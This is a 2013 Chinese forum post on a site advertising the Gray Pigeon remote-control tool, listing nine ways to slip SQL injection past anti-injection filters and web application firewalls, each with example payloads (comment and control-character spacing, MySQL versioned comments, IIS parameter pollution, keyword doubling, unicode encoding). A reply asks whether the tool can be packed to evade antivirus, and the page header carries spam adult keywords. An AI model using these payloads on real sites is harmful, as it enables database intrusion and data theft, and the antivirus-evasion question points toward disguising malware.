久久精品中文字幕,狠狠色丁香婷婷综合,精品国产制服丝袜高跟,国内精品久久久久久久久齐齐 ,国模冰莲极品自慰人体

灰鴿子遠(yuǎn)程控制軟件

 找回密碼
 立即注冊

QQ登錄

只需一步,快速開始

查看: 11650|回復(fù): 1
打印 上一主題 下一主題

繞過防注入系統(tǒng) 包括WAF的測試等多個方案 灰鴿子下載www.huigezi.org

[復(fù)制鏈接]
跳轉(zhuǎn)到指定樓層
樓主
發(fā)表于 2013-2-3 13:59:39 | 只看該作者 回帖獎勵 |倒序瀏覽 |閱讀模式
繞過防注入系統(tǒng) 包括WAF的測試等多個方案 灰鴿子下載
方案一、  把測試代碼的空格替換成  /**/  或者+     (注:/**/ 和+ 不要進(jìn)行url編碼)
?
如果要保持原樣復(fù)制代碼,需要雙擊后,選擇代碼右鍵復(fù)制即可
01
02
03 如: id=1 or 1=1
    id=1/**/or/**/1=1
    id=1+or+1=1
方案二、把空格替換成非可見字符    %09 %0A %0D %0B
?
如果要保持原樣復(fù)制代碼,需要雙擊后,選擇代碼右鍵復(fù)制即可
01
02
03
04 如: id=1 or 1=1
    id=1%09or%091=1
    id=1%0Aor%0A1=1
    id=1%0A%0Bor%0A%0B1=1
方案三、把關(guān)鍵字用 /*!*/包起來,注,這個方法只適用于mysql數(shù)據(jù)庫的站點
?
如果要保持原樣復(fù)制代碼,需要雙擊后,選擇代碼右鍵復(fù)制即可
01
02 如: id=1 and 1=1
    id=1 /*!and*/1=1
方案四、使用參數(shù)污染法攻擊繞過,注,該方法只適用于webserver是微軟的IIS的情況下
?
如果要保持原樣復(fù)制代碼,需要雙擊后,選擇代碼右鍵復(fù)制即可
01
02 如: id=1 union select 1 from admin
    id=1 union/*&id=*/select/*&id=*/from/*&id=*/admin
方案五、使用%繞過,注,該方法只適用于asp/aspx
?
如果要保持原樣復(fù)制代碼,需要雙擊后,選擇代碼右鍵復(fù)制即可
01
02 如: id=1 union select 1 from admin
    id=1 un%io%n sel%e%ct 1 fr%o%m ad%m%in
方案六、使用%23 (明文為#號)和%0A配合使用繞過,注,這個方法只適用于mysql數(shù)據(jù)庫的站點
?
如果要保持原樣復(fù)制代碼,需要雙擊后,選擇代碼右鍵復(fù)制即可
01
02 如: id=1 union select 1 from admin
    id=1%23afafasdf%0Aunion%23afafasdf%0Aselect%23afafasdf%0A1%23afafasdf%0Afrom%23afafasdf%0Aadmin
方案七、使用重復(fù)關(guān)鍵字繞過
?
如果要保持原樣復(fù)制代碼,需要雙擊后,選擇代碼右鍵復(fù)制即可
01
02 如: id=1 union select 1 from admin
    id=1 ununionion seleselectct 1 frofromm admin
方案八、使用unicode編碼繞過
?
如果要保持原樣復(fù)制代碼,需要雙擊后,選擇代碼右鍵復(fù)制即可
01
02 如: id=1 union select 1 from admin
    id=1 %u0075%u006e%u0069%u006f%u006e select 1 %u0066%u0072%u006f%u006d admin
方案九、使用畸形包繞過,只適用于 asp/aspx,詳情可以看80sec的站點
評帖賺銀幣(0) 收起
分享到:  QQ好友和群QQ好友和群
收藏收藏
沙發(fā)
發(fā)表于 2013-2-3 22:34:44 | 只看該作者
如果把輝鴿子包裝起來可以過防毒嗎?
評帖賺銀幣(0) 收起
您需要登錄后才可以回帖 登錄 | 立即注冊

本版積分規(guī)則

Archiver|手機(jī)版|小黑屋|灰鴿子遠(yuǎn)程控制軟件|灰鴿子遠(yuǎn)程控制軟件 ( 魯ICP備14000061號-4 )

GMT+8, 2025-7-2 02:33 , Processed in 0.062639 second(s), 24 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回復(fù) 返回頂部 返回列表